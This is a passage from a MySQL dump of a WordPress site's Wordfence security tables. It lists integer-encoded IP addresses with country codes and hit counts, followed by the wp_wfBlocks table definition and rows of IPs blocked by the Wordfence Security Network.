(694994617, 'DZ', 1, 17265),
(1729883369, 'VN', 1, 17292),
(2655384544, 'US', 1, 17292),
(1728523225, 'VN', 1, 17292),
(3527006264, 'ID', 2, 17292),
(633031051, 'FR', 1, 17292),
(1915728785, 'TW', 1, 17271),
(3128278202, 'CO', 1, 17265),
(645225201, 'US', 1, 17267),
(1768690486, 'DZ', 1, 17265),
(3056763507, 'SG', 20, 17265),
(2696044391, 'MA', 1, 17265),
(837089132, 'TH', 1, 17280),
(1599408102, 'NL', 1, 17280),
(2057029096, 'TH', 1, 17280),
(850036190, 'US', 1, 17271),
(1010931693, 'JP', 1, 17271),
(1224503857, 'JM', 1, 17271),
(3157539414, 'SA', 1, 17271),
(692429882, 'EG', 1, 17271),
(1336437487, 'PT', 1, 17270),
(3107039609, 'ES', 1, 17302),
(872392488, 'GB', 1, 17301),
(3332038879, 'US', 1, 17301),
(1833429877, 'IT', 1, 17301),
(3497117403, 'US', 1, 17301),
(1732504330, '', 1, 17300),
(1876519548, 'JP', 1, 17270),
(792112870, 'CA', 1, 17270),
(1295372723, 'SE', 1, 17270),
(3590043246, 'FR', 1, 17299),
(843039290, 'US', 1, 17292),
(521678460, 'ES', 2, 17292),
(1605635691, 'RS', 1, 17273),
(2537443566, 'IT', 1, 17273),
(1768869012, 'DZ', 1, 17273),
(2982956000, 'BR', 1, 17273),
(778399303, 'GB', 1, 17300),
(608990115, 'ID', 1, 17272),
(3254738604, 'TR', 1, 17271),
(1834854232, 'RS', 1, 17271),
(3171175055, 'BR', 1, 17270),
(1534241720, 'AT', 1, 17270),
(1768890868, 'DZ', 1, 17270),
(704272349, 'MA', 1, 17269),
(3127732489, 'AR', 1, 17269),
(1502039210, 'HU', 1, 17269),
(2513075873, 'DE', 1, 17268),
(1564673684, 'IT', 1, 17268),
(2536603054, 'IT', 1, 17266),
(3149830434, 'MX', 1, 17280),
(1380764866, 'RO', 1, 17270),
(1731167281, 'ID', 1, 17269),
(3159373275, 'PT', 1, 17269),
(86607465, 'SA', 1, 17273),
(1958862038, 'BD', 1, 17272),
(3120978290, 'DO', 1, 17272),
(701685514, 'AO', 1, 17271),
(1144739235, 'US', 1, 17271),
(688738866, 'ZA', 1, 17269),
(2997180598, 'UA', 2, 17269),
(2954991853, 'TR', 1, 17268),
(3188441888, 'AR', 1, 17271),
(843754294, 'US', 1, 17270),
(3103997920, 'PL', 1, 17267),
(3001018728, 'RS', 1, 17266),
(1851610344, 'PH', 1, 17265),
(694229235, 'DZ', 1, 17280),
(2015196739, 'PH', 1, 17277),
(1050879178, 'NL', 1, 17277),
(3171175154, 'BR', 1, 17340),
(1239185676, 'US', 1, 17340),
(2630103348, '', 1, 17340),
(1113016646, 'US', 1, 17340),
(3682725338, 'CN', 4, 17340),
(1676138367, 'CA', 1, 17340),
(2867854843, '', 1, 17340),
(632957447, 'AT', 1, 17340),
(1309960562, 'BE', 1, 17340),
(3574948740, 'SE', 1, 17340),
(2534459701, 'IT', 1, 17340),
(3218485542, 'BR', 1, 17340),
(3682725338, 'CN', 5, 17341),
(3154283770, 'RS', 1, 17341),
(1549150117, 'RO', 1, 17341),
(2537022330, 'IT', 1, 17341),
(3185558189, 'MX', 1, 17341),
(2390016735, 'CA', 1, 17341),
(3682725338, 'CN', 7, 17342),
(1354011537, 'IT', 1, 17342),
(1581398262, 'GR', 1, 17342),
(830516292, 'IN', 1, 17342),
(1092327198, 'US', 1, 17342),
(1549067217, 'RO', 1, 17342),
(1530341882, 'DE', 1, 17342),
(1332972736, 'RO', 1, 17342),
(1504019374, 'RO', 1, 17342),
(3127517827, 'CL', 1, 17342),
(1127030815, 'US', 1, 17342),
(759219118, 'IN', 1, 17342),
(1484276859, 'FR', 1, 17342),
(1348626918, 'HU', 1, 17342),
(2042128290, 'KR', 1, 17343),
(3682725338, 'CN', 8, 17343),
(792045249, 'IT', 1, 17343),
(1327704679, 'IT', 1, 17343),
(3590217870, 'ES', 1, 17343),
(644873987, 'US', 1, 17343),
(2945444222, 'MY', 1, 17343),
(3708042678, 'CN', 1, 17344),
(3186141464, 'MX', 1, 17344),
(1768737787, 'DZ', 1, 17344),
(3682725338, 'CN', 3, 17344),
(2851037189, 'US', 1, 17344),
(3306065029, 'TN', 1, 17344),
(1048591873, 'IL', 1, 17344),
(1908305645, 'VN', 1, 17344),
(755475457, 'US', 1, 17345),
(3293189371, '', 1, 17345),
(3216151749, 'BR', 1, 17345),
(1539836950, 'UA', 1, 17345),
(84796080, 'RO', 1, 17345),
(973497450, 'AU', 1, 17345),
(1133404225, 'US', 1, 17345),
(2970975037, 'BR', 1, 17345),
(3185120017, 'MX', 1, 17345),
(3105930270, 'PT', 1, 17345),
(3135207294, 'BR', 1, 17346),
(1329042672, 'IT', 1, 17347),
(3315981465, 'EG', 1, 17347),
(1441124516, 'SE', 1, 17347),
(2963878449, 'FR', 1, 17348),
(2094473799, 'JP', 1, 17348),
(657088345, 'PK', 1, 17348),
(2898773830, 'AU', 1, 17348),
(1452261118, 'GB', 1, 17348),
(694234475, 'DZ', 1, 17348),
(1539836950, 'UA', 1, 17348),
(1317833414, 'NL', 1, 17348),
(778276980, 'AL', 1, 17348),
(3211865851, 'CL', 1, 17348),
(1443044267, 'GB', 1, 17348),
(3168301617, 'IT', 1, 17348),
(3731698192, 'KR', 1, 17349),
(1549936997, 'AE', 1, 17349),
(1777049476, 'MU', 1, 17349),
(1839458818, 'RO', 1, 17349),
(657922338, 'PK', 1, 17349),
(1235922150, 'US', 1, 17349),
(2875283979, 'TH', 1, 17349),
(1539836950, 'UA', 1, 17349),
(1391229745, 'FR', 1, 17349),
(3319952174, 'MU', 1, 17349),
(1363303233, 'FR', 1, 17349),
(3560722714, 'GM', 1, 17349),
(1435830550, 'NL', 1, 17350),
(3291887408, 'US', 1, 17350),
(1544811101, 'GB', 1, 17350),
(1570530821, 'ES', 1, 17350),
(1539836950, 'UA', 1, 17350),
(3497108325, 'US', 1, 17350),
(694199286, 'DZ', 1, 17350),
(694508115, 'DZ', 1, 17350),
(3033775030, 'BD', 1, 17350),
(1307411185, 'CZ', 1, 17350),
(3135066780, 'BR', 1, 17350),
(1800230200, 'US', 1, 17351),
(1040268236, 'GR', 1, 17351),
(1539836950, 'UA', 2, 17351),
(3561984809, 'ES', 1, 17351),
(3104980322, 'HR', 1, 17351),
(1807545404, 'US', 1, 17351),
(1768344095, 'DZ', 1, 17351),
(2955898566, 'SA', 1, 17351),
(1550636993, 'NL', 1, 17352),
(656512273, 'PK', 1, 17352),
(1539836950, 'UA', 1, 17352),
(996019409, 'IN', 1, 17352),
(771295430, '', 1, 17352),
(2970739670, 'BR', 1, 17352),
(2631915670, '', 1, 17352),
(1081048870, 'US', 1, 17352),
(1510259739, 'FR', 1, 17352),
(700942233, 'EG', 1, 17352),
(453419362, 'IN', 1, 17353),
(3032446933, 'PH', 1, 17353),
(2058401108, 'IN', 1, 17353),
(2745975732, 'GB', 1, 17353),
(3376883719, 'BR', 1, 17353),
(3133998086, 'BR', 1, 17354),
(1307971246, 'IT', 1, 17354),
(1829708752, 'FR', 1, 17354),
(3646079390, 'DE', 1, 17354),
(1539836950, 'UA', 1, 17354),
(2058258280, 'IN', 1, 17354),
(2961112076, 'RO', 1, 17354),
(1124218043, 'US', 1, 17355),
(84712992, 'RO', 1, 17355),
(887721709, 'US', 20, 17355),
(1776310817, 'ZA', 1, 17355),
(1610237772, 'IT', 1, 17356),
(2971068426, 'BR', 1, 17356),
(2979847696, 'BR', 1, 17356),
(16883149, 'TH', 1, 17356),
(837087165, 'TH', 1, 17356),
(3197645454, 'EC', 1, 17356),
(86730617, 'BA', 1, 17356),
(779420885, 'IL', 1, 17356),
(1539836950, 'UA', 1, 17356),
(1314156440, 'LV', 1, 17356),
(2830446697, '', 1, 17357),
(3032370800, 'PH', 1, 17357),
(2047078917, 'PH', 1, 17357),
(1743248074, 'IN', 1, 17357),
(1287217583, 'US', 1, 17357),
(1892904470, 'PH', 1, 17357),
(36889934, 'AE', 1, 17357),
(1539836950, 'UA', 2, 17357),
(1333864093, 'GR', 1, 17357),
(3526612805, 'CN', 1, 17357),
(1410847463, 'PT', 1, 17358),
(1321684459, 'FR', 1, 17358),
(1539836950, 'UA', 1, 17358),
(1326068261, 'IT', 1, 17358),
(792007333, 'IT', 1, 17358),
(3321488109, 'MZ', 1, 17359),
(1326228420, 'IT', 1, 17359),
(1471709157, 'DE', 1, 17359),
(2393026044, 'CA', 1, 17359),
(2152704098, 'FR', 1, 17359),
(42616701, 'ES', 1, 17359),
(1581302042, 'GR', 1, 17359),
(1539836950, 'UA', 2, 17360),
(1235952074, 'US', 1, 17360),
(915750734, 'US', 1, 17360),
(874674276, 'US', 1, 17360),
(3481717135, 'CA', 1, 17360),
(583622267, 'US', 1, 17360),
(3197462569, 'GT', 1, 17361),
(2927706329, 'US', 1, 17361),
(702461109, 'TZ', 1, 17361),
(920891349, 'US', 1, 17361),
(585452219, 'US', 1, 17361),
(3577295515, 'IL', 1, 17361),
(455217818, 'NP', 1, 17361),
(1337027635, 'IL', 1, 17361),
(634555953, 'QA', 1, 17361),
(404453904, 'US', 1, 17361),
(692377094, 'EG', 1, 17361),
(1376975531, 'GB', 1, 17361),
(3141400205, 'BR', 1, 17362),
(585330554, 'US', 1, 17362),
(1293927825, 'SA', 1, 17362),
(835573799, 'IN', 1, 17362),
(1976044991, 'IN', 1, 17362),
(1297608708, 'CZ', 1, 17362),
(1539836950, 'UA', 1, 17362),
(874893407, 'US', 2, 17362),
(585291184, 'US', 1, 17362),
(3319954936, 'MU', 1, 17362),
(1539836950, 'UA', 2, 17363),
(3042655538, 'AR', 1, 17363),
(3361094801, 'CL', 1, 17363),
(919161641, 'US', 1, 17363),
(1678835878, 'US', 1, 17363),
(1744517895, 'IN', 1, 17363),
(585452219, 'US', 1, 17363),
(584188065, 'US', 1, 17363),
(1887841908, 'LK', 1, 17364),
(1539836950, 'UA', 1, 17364),
(1539428482, 'PL', 1, 17364),
(874738092, 'US', 2, 17364),
(1729078788, 'BD', 1, 17364),
(3164695660, 'PS', 1, 17364),
(1855096721, 'AU', 1, 17365),
(1237999338, 'US', 1, 17365),
(598145435, 'US', 1, 17365),
(1422229100, 'BE', 1, 17365),
(598069797, 'US', 1, 17365),
(885815617, 'US', 1, 17365),
(3680266720, 'MY', 1, 17365),
(1324837478, 'FR', 1, 17365),
(911757147, 'US', 1, 17365),
(3410419836, 'TW', 1, 17365),
(3269181341, 'GR', 1, 17365),
(3120616689, 'AR', 1, 17366),
(3114828415, '', 1, 17366);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfBlocks`
--

CREATE TABLE `wp_wfBlocks` (
  `IP` int(10) UNSIGNED NOT NULL,
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) UNSIGNED DEFAULT '0',
  `blockedHits` int(10) UNSIGNED DEFAULT '0',
  `wfsn` tinyint(3) UNSIGNED DEFAULT '0',
  `permanent` tinyint(3) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfBlocks`
--

INSERT INTO `wp_wfBlocks` (`IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`, `wfsn`, `permanent`) VALUES
(3164986572, 1496125250, 'Blocked by Wordfence Security Network', 1496125252, 2, 1, 0),
(1279978460, 1494174197, 'Blocked by Wordfence Security Network', 1494174199, 1, 1, 0),
(794439728, 1494596017, 'Blocked by Wordfence Security Network', 1494596019, 2, 1, 0),
(2202594575, 1494167955, 'Blocked by Wordfence Security Network', 1494168024, 1, 1, 0),
(3098029701, 1494186073, 'Blocked by Wordfence Security Network', 1494186096, 1, 1, 0),
(3056763559, 1494186058, 'Blocked by Wordfence Security Network', 1494186099, 4, 1, 0),
(1053997316, 1494167247, 'Blocked by Wordfence Security Network', 1494167375, 2, 1, 0),
(3098024781, 1494150065, 'Blocked by Wordfence Security Network', 1494150076, 1, 1, 0),
(2996829330, 1494169647, 'Blocked by Wordfence Security Network', 1494169764, 4, 1, 0),
(1743622318, 1494223472, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1893028934, 1494133399, 'Blocked by Wordfence Security Network', 1494133418, 1, 1, 0),
(2727364316, 1494184792, 'Blocked by Wordfence Security Network', 1494149433, 3, 1, 0),
(3098024846, 1494116197, 'Blocked by Wordfence Security Network', 1494116210, 2, 1, 0),
(3098029782, 1494116196, 'Blocked by Wordfence Security Network', 1494116224, 3, 1, 0),
(762746819, 1494224241, 'Blocked by Wordfence Security Network', 1494224400, 8, 1, 0),
(2111103174, 1494203699, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3237666864, 1494087976, 'Blocked by Wordfence Security Network', 1494087978, 1, 1, 0),
(1632276610, 1494084900, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3098024844, 1494084893, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1729883369, 1494084572, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2655384544, 1494084560, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1728523225, 1494084560, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3527006264, 1494204322, 'Blocked by Wordfence Security Network', 1494204426, 6, 1, 0),
(633031051, 1494134009, 'Blocked by Wordfence Security Network', 1494134260, 1, 1, 0),
(843039290, 1494084555, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(521678460, 1494223417, 'Blocked by Wordfence Security Network', 1494084584, 2, 1, 0),
(3423600883, 1494203507, 'Blocked by Wordfence Security Network', 1494203564, 3, 1, 0),
(2746000698, 1494203485, 'Blocked by Wordfence Security Network', 1494203690, 6, 1, 0),
(469651732, 1494072996, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2988470183, 1494100230, 'Blocked by Wordfence Security Network', 1494100340, 6, 1, 0),
(3164982411, 1494204457, 'Blocked by Wordfence Security Network', 1494084536, 2, 1, 0),
(3353828771, 1494084554, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1632245985, 1494060818, 'Blocked by Wordfence Security Network', 1494060838, 2, 1, 0),
(3346287710, 1494116335, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3069127338, 1494184828, 'Blocked by Wordfence Security Network', 1494184862, 2, 1, 0),
(1138881296, 1494167247, 'Blocked by Wordfence Security Network', 1494167509, 4, 1, 0),
(3191614634, 1494173321, 'Blocked by Wordfence Security Network', 1494173323, 2, 1, 0),
(637050808, 1493312452, 'Blocked by Wordfence Security Network', 1493312455, 4, 1, 0),
(28968311, 1493316187, 'Blocked by Wordfence Security Network', 1493316190, 4, 1, 0),
(621184356, 1493320110, 'Blocked by Wordfence Security Network', 1493320112, 4, 1, 0),
(3412761521, 1493340938, 'Blocked by Wordfence Security Network', 1493340942, 4, 1, 0),
(831636304, 1493351968, 'Blocked by Wordfence Security Network', 1493351973, 4, 1, 0),
(702768013, 1493352643, 'Blocked by Wordfence Security Network', 1493352646, 4, 1, 0),
(2873895206, 1493386238, 'Blocked by Wordfence Security Network', 1493386241, 4, 1, 0),
(2058018895, 1493404013, 'Blocked by Wordfence Security Network', 1493404015, 4, 1, 0),
(608761984, 1493410002, 'Blocked by Wordfence Security Network', 1493410039, 4, 1, 0),
(1549131029, 1493416810, 'Blocked by Wordfence Security Network', 1493416812, 4, 1, 0),
(3197714889, 1493425785, 'Blocked by Wordfence Security Network', 1493425789, 4, 1, 0),
(2979895540, 1493427777, 'Blocked by Wordfence Security Network', 1493427793, 4, 1, 0),
(3039577960, 1493433332, 'Blocked by Wordfence Security Network', 1493433335, 4, 1, 0),
(3304677463, 1493436060, 'Blocked by Wordfence Security Network', 1493436063, 4, 1, 0),
(1023584817, 1493439195, 'Blocked by Wordfence Security Network', 1493439198, 4, 1, 0),
(1430349643, 1493439696, 'Blocked by Wordfence Security Network', 1493439699, 4, 1, 0),
(1149515385, 1493440366, 'Blocked by Wordfence Security Network', 1493440368, 4, 1, 0),
(2917961944, 1493591700, 'Blocked by Wordfence Security Network', 1493591702, 1, 1, 0),
(3195004720, 1493671338, 'Blocked by Wordfence Security Network', 1493671343, 4, 1, 0),
(773229120, 1493702332, 'Blocked by Wordfence Security Network', 1493702334, 1, 1, 0),
(1571457074, 1493805430, 'Blocked by Wordfence Security Network', 1493805432, 1, 1, 0),
(794450239, 1493805944, 'Blocked by Wordfence Security Network', 1493805947, 1, 1, 0),
(3326600728, 1493806833, 'Blocked by Wordfence Security Network', 1493806835, 1, 1, 0),
(3644686526, 1493806977, 'Blocked by Wordfence Security Network', 1493806978, 1, 1, 0),
(3497113801, 1493945486, 'Blocked by Wordfence Security Network', 1493945487, 1, 1, 0),
(3497113622, 1495586186, 'Blocked by Wordfence Security Network', 1495586188, 5, 1, 0),
(3497110456, 1495688389, 'Blocked by Wordfence Security Network', 1495688391, 2, 1, 0),
(3590043250, 1494344413, 'Blocked by Wordfence Security Network', 1494344414, 2, 1, 0),
(3382964636, 1493310999, 'Blocked by Wordfence Security Network', 1493311003, 4, 1, 0),
(3157204740, 1493310765, 'Blocked by Wordfence Security Network', 1493310768, 4, 1, 0),
(1396104586, 1493305620, 'Blocked by Wordfence Security Network', 1493305622, 4, 1, 0),
(1317189474, 1493283580, 'Blocked by Wordfence Security Network', 1493283583, 4, 1, 0),
(1449745144, 1493296040, 'Blocked by Wordfence Security Network', 1493296043, 4, 1, 0),
(1887828803, 1493302076, 'Blocked by Wordfence Security Network', 1493302079, 4, 1, 0),
(2391196847, 1493269667, 'Blocked by Wordfence Security Network', 1493269670, 4, 1, 0),
(1892041857, 1493261050, 'Blocked by Wordfence Security Network', 1493261053, 4, 1, 0),
(3142072067, 1493256849, 'Blocked by Wordfence Security Network', 1493256852, 4, 1, 0),
(3159244987, 1493253264, 'Blocked by Wordfence Security Network', 1493253266, 4, 1, 0),
(86750727, 1493245537, 'Blocked by Wordfence Security Network', 1493245540, 4, 1, 0),
(1833643342, 1493233679, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2760119799, 1493230816, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835651188, 1493216472, 'Blocked by Wordfence Security Network', 1493216475, 4, 1, 0),
(702781337, 1493197801, 'Blocked by Wordfence Security Network', 1493197804, 4, 1, 0),
(832022104, 1493195192, 'Blocked by Wordfence Security Network', 1493195196, 4, 1, 0),
(3360841433, 1493176793, 'Blocked by Wordfence Security Network', 1493176797, 4, 1, 0),
(1590804861, 1493169152, 'Blocked by Wordfence Security Network', 1493169155, 4, 1, 0),
(1223522106, 1493168329, 'Blocked by Wordfence Security Network', 1493168332, 4, 1, 0),
(3182212288, 1493165930, 'Blocked by Wordfence Security Network', 1493165933, 4, 1, 0),
(1565928623, 1493163212, 'Blocked by Wordfence Security Network', 1493163215, 4, 1, 0),
(2957549377, 1493158682, 'Blocked by Wordfence Security Network', 1493158685, 4, 1, 0),
(3017071845, 1493152168, 'Blocked by Wordfence Security Network', 1493152171, 4, 1, 0),
(702589396, 1493141221, 'Blocked by Wordfence Security Network', 1493141224, 4, 1, 0),
(1589523921, 1493332454, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1293756220, 1493132339, 'Blocked by Wordfence Security Network', 1493132341, 4, 1, 0),
(2738198454, 1493104871, 'Blocked by Wordfence Security Network', 1493104875, 4, 1, 0),
(1401323221, 1493121788, 'Blocked by Wordfence Security Network', 1493121790, 4, 1, 0),
(1887842097, 1493123094, 'Blocked by Wordfence Security Network', 1493123097, 4, 1, 0),
(2943288819, 1493104704, 'Blocked by Wordfence Security Network', 1493104708, 4, 1, 0),
(702756256, 1493104435, 'Blocked by Wordfence Security Network', 1493104438, 4, 1, 0),
(1741772220, 1493098899, 'Blocked by Wordfence Security Network', 1493098903, 4, 1, 0),
(3754818252, 1493087945, 'Blocked by Wordfence Security Network', 1493087949, 4, 1, 0),
(2637388761, 1493087466, 'Blocked by Wordfence Security Network', 1493087469, 4, 1, 0),
(2399207350, 1493087412, 'Blocked by Wordfence Security Network', 1493087415, 4, 1, 0),
(2320235926, 1493085701, 'Blocked by Wordfence Security Network', 1493085704, 4, 1, 0),
(842254621, 1493079982, 'Blocked by Wordfence Security Network', 1493079985, 4, 1, 0),
(86724239, 1493075786, 'Blocked by Wordfence Security Network', 1493075788, 4, 1, 0),
(1473126706, 1493071787, 'Blocked by Wordfence Security Network', 1493071789, 4, 1, 0),
(1837181866, 1493068009, 'Blocked by Wordfence Security Network', 1493068011, 4, 1, 0),
(1242501469, 1493057105, 'Blocked by Wordfence Security Network', 1493057107, 4, 1, 0),
(1459691243, 1493057139, 'Blocked by Wordfence Security Network', 1493057142, 4, 1, 0),
(1484515861, 1493055055, 'Blocked by Wordfence Security Network', 1493055057, 4, 1, 0),
(1892753981, 1493053170, 'Blocked by Wordfence Security Network', 1493053174, 4, 1, 0),
(837089132, 1493036722, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1599408102, 1493026369, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2057029096, 1493015499, 'Blocked by Wordfence Security Network', 1493015504, 4, 1, 0),
(3149830434, 1493000029, 'Blocked by Wordfence Security Network', 1493000032, 4, 1, 0),
(694229235, 1492994207, 'Blocked by Wordfence Security Network', 1492994209, 4, 1, 0),
(1578617924, 1494224217, 'Blocked by Wordfence Security Network', 1494224374, 3, 1, 0),
(3098024843, 1494203540, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3059525007, 1495096161, 'Blocked by Wordfence Security Network', 1495096173, 8, 1, 0),
(736163900, 1494310133, 'Blocked by Wordfence Security Network', 1494310208, 83, 1, 0),
(1299175467, 1494345339, 'Blocked by Wordfence Security Network', 1494345341, 1, 1, 0),
(1743847615, 1494520585, 'Blocked by Wordfence Security Network', 1494520591, 1, 1, 0),
(2513063543, 1494521117, 'Blocked by Wordfence Security Network', 1494521118, 1, 1, 0),
(1570692602, 1494521597, 'Blocked by Wordfence Security Network', 1494521598, 1, 1, 0),
(2901752882, 1494522689, 'Blocked by Wordfence Security Network', 1494522691, 1, 1, 0),
(1572433768, 1494678340, 'Blocked by Wordfence Security Network', 1494678341, 2, 1, 0),
(3116589525, 1494596451, 'Blocked by Wordfence Security Network', 1494596452, 1, 1, 0),
(1119841390, 1495360892, 'Blocked by Wordfence Security Network', 1495360894, 2, 1, 0),
(1728585030, 1494603905, 'Blocked by Wordfence Security Network', 1494603907, 1, 1, 0),
(1168365674, 1494678892, 'Blocked by Wordfence Security Network', 1494678894, 1, 1, 0),
(3590043246, 1494684435, 'Blocked by Wordfence Security Network', 1494684436, 1, 1, 0),
(1427222478, 1494750687, 'Blocked by Wordfence Security Network', 1494750688, 1, 1, 0),
(778399303, 1494751507, 'Blocked by Wordfence Security Network', 1494751508, 1, 1, 0),
(1732504330, 1495585685, 'Blocked by Wordfence Security Network', 1495585688, 2, 1, 0),
(3497117403, 1494829488, 'Blocked by Wordfence Security Network', 1494829490, 1, 1, 0),
(1833429877, 1494839680, 'Blocked by Wordfence Security Network', 1494839683, 4, 1, 0),
(3332038879, 1494856727, 'Blocked by Wordfence Security Network', 1494856747, 4, 1, 0),
(872392488, 1494885335, 'Blocked by Wordfence Security Network', 1494885337, 4, 1, 0),
(3107039609, 1495776658, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539837019, 1497919538, 'Blocked by Wordfence Security Network', 1495748307, 2, 1, 0),
(1434732386, 1495186790, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1168360410, 1495363943, 'Blocked by Wordfence Security Network', 1495363945, 2, 1, 0),
(1053969232, 1495259647, 'Blocked by Wordfence Security Network', 1495259671, 1, 1, 0),
(1079652533, 1495260232, 'Blocked by Wordfence Security Network', 1495260234, 1, 1, 0),
(3056768804, 1495271338, 'Blocked by Wordfence Security Network', 1495271423, 1, 1, 0),
(1586073137, 1495340881, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(598138358, 1495361453, 'Blocked by Wordfence Security Network', 1495361454, 1, 1, 0),
(3497114222, 1495361935, 'Blocked by Wordfence Security Network', 1495361936, 1, 1, 0),
(3105930270, 1498690202, 'Blocked by Wordfence Security Network', 1498690204, 2, 1, 0),
(3476728705, 1495362457, 'Blocked by Wordfence Security Network', 1495362459, 1, 1, 0),
(3280140082, 1495362812, 'Blocked by Wordfence Security Network', 1495362819, 1, 1, 0),
(3586257058, 1496014267, 'Blocked by Wordfence Security Network', 1496014268, 2, 1, 0),
(1741512757, 1496463021, 'Blocked by Wordfence Security Network', 1496463023, 2, 1, 0),
(1833311020, 1495470988, 'Blocked by Wordfence Security Network', 1495470990, 1, 1, 0),
(3237921028, 1495471953, 'Blocked by Wordfence Security Network', 1495471955, 1, 1, 0),
(1729627112, 1495911578, 'Blocked by Wordfence Security Network', 1495911580, 2, 1, 0),
(1495980045, 1495473240, 'Blocked by Wordfence Security Network', 1495473242, 1, 1, 0),
(3163163411, 1496709296, 'Blocked by Wordfence Security Network', 1496709298, 3, 1, 0),
(842965149, 1495583194, 'Blocked by Wordfence Security Network', 1495583198, 1, 1, 0),
(3635199372, 1495583530, 'Blocked by Wordfence Security Network', 1495583532, 1, 1, 0),
(842969123, 1495584571, 'Blocked by Wordfence Security Network', 1495584573, 1, 1, 0),
(3590043248, 1495586644, 'Blocked by Wordfence Security Network', 1495586645, 1, 1, 0),
(3242600154, 1495587211, 'Blocked by Wordfence Security Network', 1495587212, 1, 1, 0),
(1760853483, 1495687824, 'Blocked by Wordfence Security Network', 1495687827, 1, 1, 0),
(1828828346, 1495970055, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(783839564, 1495771606, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658598, 1495951743, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1401863434, 1495784050, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1042038966, 1495852932, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3170385964, 1495863878, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3735412901, 1495795232, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1845364905, 1495806054, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3489067105, 1496649439, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212082, 1495808120, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1941604657, 1495812262, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1828725649, 1495814331, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3387838170, 1495914378, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(781668949, 1495985527, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1495116718, 1495825048, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2030594922, 1495827571, 'Blocked by Wordfence Security Network', 1495827576, 2, 1, 0),
(1563679021, 1495949720, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2949647692, 1495892193, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1046956164, 1495833372, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3397466494, 1495971977, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1534992972, 1495837555, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(783835753, 1495839704, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1828725654, 1495841872, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212154, 1495859479, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539836981, 1495884375, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2156323210, 1495900481, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212158, 1495882369, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3107039490, 1495896342, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(529855267, 1495902427, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658391, 1495904455, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2548839223, 1495910237, 'Blocked by Wordfence Security Network', 1495910239, 2, 1, 0),
(3555103830, 1495910916, 'Blocked by Wordfence Security Network', 1495910919, 1, 1, 0),
(3168080791, 1495911249, 'Blocked by Wordfence Security Network', 1495911252, 1, 1, 0),
(3151105913, 1495912251, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658403, 1495918391, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3152885982, 1495924494, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(529853472, 1495928647, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658399, 1495930829, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3415089988, 1495932996, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3362989667, 1495935070, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3415091724, 1495937167, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3001689384, 1495941420, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658395, 1495957823, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835211794, 1495961949, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(48857242, 1495966069, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1342920287, 1495968064, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(786077451, 1495973935, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1501163646, 1495975788, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2032732065, 1496015193, 'Blocked by Wordfence Security Network', 1496012990, 1, 1, 0),
